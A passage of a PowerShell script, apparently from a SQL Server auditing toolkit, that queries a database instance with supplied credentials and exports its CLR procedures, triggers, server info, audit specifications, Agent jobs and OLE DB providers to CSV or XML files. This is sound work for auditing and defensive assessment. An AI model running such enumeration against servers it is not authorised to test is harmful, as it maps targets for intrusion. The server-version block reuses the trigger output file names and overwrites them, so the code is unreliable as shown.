-Credential $Credential -SuppressVerbose if($xml) { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Database_stored_procedur_CLR.xml' $Results | Export-Clixml $OutPutPath } else { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Database_CLR_stored_procedure_CLR.csv' $Results | Export-Csv -NoTypeInformation $OutPutPath } # Getting Triggers DML Write-Verbose -Message "$Instance - Getting DML triggers..." $Results = Get-SQLTriggerDml -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose if($xml) { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_triggers_dml.xml' $Results | Export-Clixml $OutPutPath } else { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_triggers_dml.csv' $Results | Export-Csv -NoTypeInformation $OutPutPath } # Getting Triggers DDL Write-Verbose -Message "$Instance - Getting DDL triggers..." $Results = Get-SQLTriggerDdl -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose if($xml) { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_triggers_ddl.xml' $Results | Export-Clixml $OutPutPath } else { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_triggers_ddl.csv' $Results | Export-Csv -NoTypeInformation $OutPutPath } # Getting Version Information Write-Verbose -Message "$Instance - Getting server version information..." $Results = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose if($xml) { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_triggers_dml.xml' $Results | Export-Clixml $OutPutPath } else { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_triggers_dml.csv' $Results | Export-Csv -NoTypeInformation $OutPutPath } # Getting Audit Database Specification Information Write-Verbose -Message "$Instance - Getting Database audit specification information..." $Results = Get-SQLAuditDatabaseSpec -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose if($xml) { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_Audit_Database_Specifications.xml' $Results | Export-Clixml $OutPutPath } else { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_Audit_Database_Specifications.csv' $Results | Export-Csv -NoTypeInformation $OutPutPath } # Getting Audit Server Specification Information Write-Verbose -Message "$Instance - Getting Server audit specification information..." $Results = Get-SQLAuditServerSpec -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose if($xml) { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_Audit__Server_Specifications.xml' $Results | Export-Clixml $OutPutPath } else { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_Audit_Server_Specifications.csv' $Results | Export-Csv -NoTypeInformation $OutPutPath } # Getting Agent Jobs Information Write-Verbose -Message "$Instance - Getting Agent Jobs information..." $Results = Get-SQLAgentJob -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose if($xml) { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_Agent_Job.xml' $Results | Export-Clixml $OutPutPath } else { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_Agent_Jobs.csv' $Results | Export-Csv -NoTypeInformation $OutPutPath } # Getting OLE DB provder information Write-Verbose -Message "$Instance - Getting OLE DB provder information..." $Results = Get-SQLOleDbProvder -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose if($xml) { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_OleDbProvders.xml' $Results | Export-Clixml $OutPutPath } else { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_OleDbProvders.csv' $Results | Export-Csv -NoTypeInformation $OutPutPath } Write-Verbose -Message "$Instance - END" } End { } } #endregion